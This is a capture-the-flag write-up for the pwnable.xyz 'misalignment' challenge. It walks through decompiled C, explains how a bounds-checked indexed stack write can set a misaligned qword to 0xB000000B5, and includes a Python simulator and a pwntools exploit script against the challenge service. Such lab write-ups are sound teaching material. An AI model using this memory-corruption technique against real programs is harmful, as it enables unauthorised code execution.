Wargame Write-Up/Pwnable.xyz

(Pwnable.xyz) misalignment writeup

by snwo 2022. 1. 11.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 s[20]; // [rsp+10h] [rbp-A0h] BYREF

  s[19] = __readfsqword(0x28u);
  setup();
  memset(s, 0, 0x98uLL);
  *(_QWORD *)((char *)&s[1] + 7) = 0xDEADBEEFLL;   // unaligned qword at byte offset 15 of s
  while ( _isoc99_scanf("%ld %ld %ld", &s[4], &s[5], &s[6]) == 3 && s[6] <= 9 && s[6] >= -7 )
  {
    s[s[6] + 7] = s[4] + s[5];
    printf("Result: %ld\n", s[s[6] + 7]);
  }
  if ( *(_QWORD *)((char *)&s[1] + 7) == 0xB000000B5LL )
    win();
  return 0;
}

It's similar to the previous challenge, add, but here the index s[6] is restricted to -7 ~ 9, so the write s[s[6] + 7] only reaches s[0] ~ s[16]. The saved return address sits at rbp+8, which would be s[21], so it is out of range, and PIE is enabled anyway. The way in is the win() check instead.

The checked value is not an aligned element of s: it is the 8 bytes starting at (char *)&s[1] + 7, i.e. bytes 15 ~ 22 of s, which straddle the top byte of s[1] and the low 7 bytes of s[2]. Little-endian, 0xB000000B5 is the byte sequence B5 00 00 00 0B 00 00 00, so to make that read return 0xB000000B5:

s[2] should be set to 0xB000000 ( 184549376 ), the low 7 bytes 00 00 00 0B 00 00 00,

s[1] to 0xB500000000000000 ( -5404319552844595200 ), so that its top byte is 0xB5.

The values are read with %ld, which is signed, so the 0xB5... pattern has to be sent as its two's complement value.

To convert unsigned to signed, import ctypes and use

ctypes.c_int64(0xB500000000000000).value, which returns the signed 64-bit value (-5404319552844595200).


In s[s[6] + 7] = s[4] + s[5], writing s[1] needs s[6] = -6,

and writing s[2] needs s[6] = -5. s[4] can stay 0 so that s[5] is stored as-is.
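The three steps above (split the target qword into the aligned words it overlaps, convert the patterns to signed longs for %ld, and turn word indices into s[6] values) can be done generically rather than by hand. The script below is an added example, not the original exploit from this post: it models the loop from the decompiled main() locally with struct/ctypes (offset 15, 20-word array, index range -7 ~ 9 are taken from the decompilation; nothing talks to the service) and would also work for a different misaligned offset or target value.

```python
import ctypes
import struct

# Model of the stack layout in the decompiled main(): s is __int64 s[20] at rbp-0xA0,
# and the check reads a qword at (char *)&s[1] + 7, i.e. byte offset 15 inside s.
NWORDS = 20
MISALIGNED_OFFSET = 8 * 1 + 7
TARGET = 0xB000000B5
SAVED_RET_INDEX = (0xA0 + 8) // 8      # rbp+8 expressed as an index into s -> 21
INDEX_RANGE = range(-7, 10)            # values of s[6] the loop accepts


def to_signed64(value):
    """Reinterpret a 64-bit pattern as the signed long that scanf("%ld") parses."""
    return ctypes.c_int64(value & 0xFFFFFFFFFFFFFFFF).value


def split_misaligned_qword(target, offset, nwords=NWORDS):
    """Map each aligned word s[i] overlapped by the qword at byte `offset` to the
    (unsigned) value it must hold so that a little-endian read at `offset` gives target."""
    buf = bytearray(8 * nwords)
    buf[offset:offset + 8] = struct.pack("<Q", target)
    first, last = offset // 8, (offset + 7) // 8
    return {i: struct.unpack_from("<Q", buf, 8 * i)[0] for i in range(first, last + 1)}


def scanf_lines(target=TARGET, offset=MISALIGNED_OFFSET):
    """Build the '%ld %ld %ld' lines: s[4] = 0, s[5] = value, s[6] = i - 7 so that
    s[s[6] + 7] = s[4] + s[5] lands in s[i]. Raises if a word is outside the index range."""
    lines = []
    for i, unsigned in sorted(split_misaligned_qword(target, offset).items()):
        if i - 7 not in INDEX_RANGE:
            raise ValueError(f"s[{i}] is not reachable with the allowed index range")
        lines.append(f"0 {to_signed64(unsigned)} {i - 7}")
    return lines


def simulate(lines, offset=MISALIGNED_OFFSET, nwords=NWORDS):
    """Replay the lines against a model of the loop and return the qword the final check reads."""
    s = [0] * nwords
    for line in lines:
        a, b, c = map(int, line.split())
        if c not in INDEX_RANGE:
            break                      # the real loop stops on an out-of-range index
        s[c + 7] = to_signed64(a + b)  # 64-bit wraparound like the C addition
    raw = b"".join(struct.pack("<q", v) for v in s)
    return struct.unpack_from("<Q", raw, offset)[0]


def reachable_indices():
    """Indices of s the write can reach: s[0] .. s[16]; the saved return address (s[21]) is not among them."""
    return [c + 7 for c in INDEX_RANGE]


if __name__ == "__main__":
    for line in scanf_lines():
        print(line)
    print(hex(simulate(scanf_lines())))   # 0xb000000b5
```

The generated lines write s[1] before s[2]; the order does not matter because each line is an independent store, and the final check is only evaluated once the loop exits.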

ex.py

from pwn import *

r = remote("svc.pwnable.xyz", 30003)

# s[s[6] + 7] = s[4] + s[5]; s[4] = 0, so s[5] is stored unchanged.
# s[6] = -5 -> s[2] = 0x0B000000 (the upper 7 bytes of the misaligned qword)
r.sendline(b"0 184549376 -5")
# s[6] = -6 -> s[1] = 0xB500000000000000 (its top byte 0xB5 is the lowest byte of the qword)
r.sendline(b"0 -5404319552844595200 -6")
# anything scanf cannot parse as three %ld makes it return != 3 and leaves the loop,
# after which the check passes and win() is called
r.sendline(b".")
r.interactive()